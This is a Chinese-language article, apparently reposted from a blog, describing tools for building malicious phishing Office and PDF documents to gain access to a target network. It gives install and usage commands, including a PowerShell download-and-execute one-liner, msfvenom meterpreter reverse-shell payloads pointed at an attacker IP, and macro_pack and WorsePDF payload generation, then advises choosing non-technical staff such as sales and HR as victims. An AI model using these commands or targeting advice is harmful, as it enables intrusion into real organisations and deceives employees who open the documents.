制作恶意钓鱼文档的多种工具

gclome

原文链接：制作恶意钓鱼文档的多种工具

在突破目标网络时，经常会用到网络钓鱼技术，而制作恶意文档，诱骗用户点击，就能获得用户设备的访问权限，这是获取目标内网权限最为直接的方式，本文介绍几个制作恶意文档的工具。


Luckystrike该工具主要使用 COM 对象来执行嵌入 Office 文档的恶意 Payload。
项目地址：

https://github.com/curi0usJack/luckystrike

使用方法：
1、使用管理员权限，执行下面的命令进行初始化安装：

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

​
2、前往 luckystrike 的文件夹，执行脚本 luckystrike.ps1 进入主菜单：
​
3、根据菜单提示，创建一个名为 test 的 PowerShell 脚本：
​
4、查看我们生成的 payload
​
接下来就可以创建一个嵌入该 Payload 的恶意文件了。

Office-DDE-Payloads这个工具利用 Office 的 DDE（Dynamic Data Exchange）来执行 Payload。
下载地址：

https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

安装好之后，执行 ddeexcel.py 生成 excel 文档，执行 ddeword.py 生成 word 文档：
​
在目标机器上打开该文档时，弹出下面的提示：
​
但是并没有看到有计算器弹出，但是查看后台进程发现计算机的进程已经有了。这个工具比较容易设置和使用，但是没有达到想要的效果。

wePWNise这个工具会生成一个 VBA 代码，嵌入 Office 文档或者模版文件中。
下载地址：

https://github.com/mwrlabs/wePWNise

​
比如使用 Metasploit 的 Paylaod，首先使用 msfvenom 生成一个可以使用的 payload：

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT= -f raw -o /payloads/msf86.raw

or

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT= -f raw -a x86_64 -o /payloads/msf64.raw

然后使用 wePWNise 生成 payload 输出到 文件中：

$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

MacroShop下载地址：

https://github.com/khr0x40sh/MacroShop

使用 Veil 创建一个 Payload，安装方式：

1. apt -y install veil
   
2. /usr/share/veil/config/setup.sh --force --silent
   
3. or
   
4. git clone https://github.com/Veil-Framework/Veil.git
   
5. cd Veil/
   
6. ./config/setup.sh --force --silent

复制代码

安装好之后，使用下面的命令生成 Payload：

1. python veil.py
   
2. use 1
   
3. use <payload of your choice>
   
4. Fill in the options to meet your needs.
   
5. generate

复制代码

生成的 Payload 存储在：

/var/lib/veil/output/source

​
使用命令：

./macro_safe.py /var/lib/veil/output/source/test.bat test

最终输出的脚本内容如下：
​
macro_pack下载地址：

https://github.com/sevagas/macro_pack

安装好之后，使用命令：

python3 test/mp_test.py

​
使用下面的命令生成文文档：

python3 macro_pack.py -t METERPRETER -G test.xls -p

​
Worse-PDF生成恶意的 PDF 文档，下载地址：

https://github.com/3gstudent/Worse-PDF

使用方法：

python WorsePDF.py <normal PDF> <serverIP>

​
总结Office 恶意文档是目前最常见的钓鱼手段，也最容易被人警觉，通过邮件发送恶意文档，很多时候会被翻钓鱼邮件网关识别并拦截，如果不存在 Office 软件漏洞的情况，成功率取决于用户的安全意识，所以针对目标用户的选择非常重要，尽量不要选择企业内部的 IT 人员，选择哪些对电脑不熟悉的业务人员，比如销售、HR、行政等人员。